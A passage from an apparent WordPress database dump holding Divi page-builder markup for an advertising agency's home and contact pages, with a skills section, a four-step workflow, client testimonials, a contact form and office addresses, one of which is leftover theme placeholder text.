button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||92px|||\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png\" alt=\"Best Advertising agency\" title_text=\"best-advertising-agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" custom_margin=\"40px||59px|||\" custom_margin_tablet=\"||0px||false|false\" custom_margin_phone=\"3px||0px||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"30px||0px||false|false\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" padding_1_tablet=\"\" padding_1_phone=\"0px|||10%|false|false\" padding_1_last_edited=\"on|phone\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_margin_tablet=\"|||40px|false|false\" custom_margin_phone=\"|||30px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_margin_tablet=\"|||40px|false|false\" custom_margin_phone=\"|||30px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5-1.jpg\" alt=\"digital marketing agency\" title_text=\"digital-marketing-agency\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"P Sarvanan\" job_title=\"Managing Director\" company_name=\"Andslite\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-4.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\" hover_enabled=\"0\" alt=\"P Sarvanan\" title_text=\"Client Testimonial Advertising\"]<p>“Excellent support and proactiviness and hunger to execute the project with novel ideas make me an all time client .”</p>\n[/et_pb_testimonial][et_pb_testimonial author=\"Mrityunjaya\" job_title=\"Marketing Head\" company_name=\"Renefurterer\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\" hover_enabled=\"0\" alt=\"Mritunjya\" title_text=\"Client Testimonial graphic design\"]“They are superb in planning and graphic designing. I feel comfortable, narrating the ideas, as their interest level and curiosity excite me to do brilliant work..”[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Amit Rathod\" job_title=\"Marketing Manager\" company_name=\"Deutsche Bank\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\" hover_enabled=\"0\" alt=\"Amit\" title_text=\"Client Testimonial digital\"]“I always feel excited with the young and energetic team of WTH, I love the innovative creative ideas they bring to every project, I share with them..”[/et_pb_testimonial][et_pb_testimonial author=\"Sandeep\" job_title=\"Marketing\" company_name=\"Yamaha Motor Company\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\" hover_enabled=\"0\" alt=\"Sandeep\" title_text=\"Client Testimonial digital\"]“It is always an exciting journey to work with team WTH and I am glad to share my experience that they are outstanding, in terms of understanding the brief and executing it as per our business need. Best Digital Agency”\n[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-08 20:11:21','2020-08-08 20:11:21','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/08/134-revision-v1/',0,'revision','',0),(708,1,'2020-08-08 20:13:01','2020-08-08 20:13:01','[et_pb_section fb_built=\"1\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>COntact US</h1>[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Section\" _builder_version=\"3.22\" custom_padding=\"50px||50px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" admin_label=\"Contact Area\" _builder_version=\"3.25\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" hover_enabled=\"0\"]<h4>Delhi</h4>\n<p>B-53/2, Naraina Vihar, New Delhi - 110028, India</p>\n<p>+91 9315666436</p>\n<p><a href=\"mailto:dhiraj@wthtest1.in8.cdn-alpha.com\">dhiraj@wthtest1.in8.cdn-alpha.com</a></p>\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" locked=\"off\"]<h4>Bangalore</h4>\n<p>22 East 41/B Street,<br /> San Francisco, CA 30401, USA</p>\n<p>+22 1234 5678 5411</p>\n<p><a href=\"mailto:info@designagency.com\">infoSF@designagency.com</a></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" 